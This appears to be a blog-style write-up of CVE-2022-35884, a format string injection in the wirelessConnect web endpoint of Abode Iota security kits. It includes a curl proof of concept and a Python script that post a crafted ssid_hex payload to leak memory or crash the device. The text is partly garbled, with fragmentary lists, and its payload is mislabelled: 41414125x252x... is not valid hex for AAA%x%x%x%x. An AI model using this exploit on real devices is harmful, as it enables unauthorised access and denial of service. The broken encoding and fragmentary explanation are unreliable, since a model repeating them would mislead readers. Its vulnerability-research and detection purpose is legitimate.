CVE-2022-35884 - Format String Injection in Abode Iota All-In-One Security Kit (6.9Z/6.9X) — Deep Dive, Exploit Tips & Code

Summary  
Abode Systems, Inc.'s Iota All-In-One Security Kit versions 6.9Z and 6.9X are impacted by four format string injection vulnerabilities in their /action/wirelessConnect web interface. Attackers—once logged in—can send manipulated HTTP POST requests, exploiting the ssid_hex parameter, to potentially cause denial of service, memory corruption, or leak sensitive data from device memory.

What’s format string injection, and why it matters

- How /action/wirelessConnect is vulnerable

What is a Format String Injection?

A *format string injection* happens when user-controlled input is unsafely passed to functions like printf() or sprintf() as the format argument, rather than as data. This can allow attackers to:

*Write* arbitrary values in rarer cases (%n)

TL;DR: It’s dangerous, and can be easy to exploit if the underlying code isn’t careful.

The Iota security hub’s setup page allows users to connect to Wi-Fi via an endpoint

POST /action/wirelessConnect

A request parameter named ssid_hex—which represents the Wi-Fi name in hexadecimal form—is passed unchecked into a function that treats it as a format string, e.g.:

// (Decompiled pseudo-C)
char ssid_ascii[128];
sprintf(ssid_ascii, ssid_hex);

This means if the attacker includes format specifiers in ssid_hex, the code will process them, interpreting random memory from the device as variables.

Proof of Concept: Triggering the Bug

Precondition: You must be authenticated (logged in).

Here’s a curl command demonstrating the attack

curl -i -u admin:PASSWORD \
  -d 'ssid_hex=41414125x252x252x252x' \
  -d 'password=4141' \
  http://iotahost.local/action/wirelessConnect

41414125x252x252x252x is hex for AAA%x%x%x%x

- This string, when processed, causes the firmware to interpret those %xs as format tokens, pulling “stack” values and potentially leaking device memory.

Here’s a small script to automate the attack and print what’s returned

import requests

url = "http://iotahost.local/action/wirelessConnect"
auth = ("admin", "PASSWORD")

ssid_payload = "41414125x252x252x252x"  # Equals 'AAA%x%x%x%x' in ASCII/hex
data = {
    "ssid_hex": ssid_payload,
    "password": "4141"
}

r = requests.post(url, data=data, auth=auth)
print("Response:", r.text)

You may need to adjust authentication details or endpoint based on your setup.

The web server may crash (DoS)

- Sensitive data (Wi-Fi passwords, config, even parts of TLS keys) can leak via the web response, especially if the format string is %s or %x repeated
- Persistent memory corruption is technically possible, depending on the handler’s implementation, especially with %n directives if allowed.

Note: Because authentication is required, the attacker must first obtain or guess credentials — but default or weak passwords are very common in IoT deployments.

How to Detect

1. Look for unusual HTTP requests to /action/wirelessConnect with strange ssid_hex (ASCII translated, lots of %)

Official References

- Original CVE Record (CVE-2022-35884)
- ZDI Public Disclosure (ZDI-22-1247)
- Abode Security Kit Product Page

Further Reading

- What is Format String Vulnerability? (OWASP)
- How To Exploit Format Strings (old but gold)

TL;DR

The four format string bugs in /action/wirelessConnect on Abode Iota Security Kits can lead to info leaks or full DoS, and may be exploited by anyone with valid login. Never pass unchecked user input as a format string — always sanitize first, and keep your IoT firmware updated!


*This write-up is for educational and defensive purposes only. Do not exploit systems without proper authorization.*

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/27/2022 15:17:00 UTC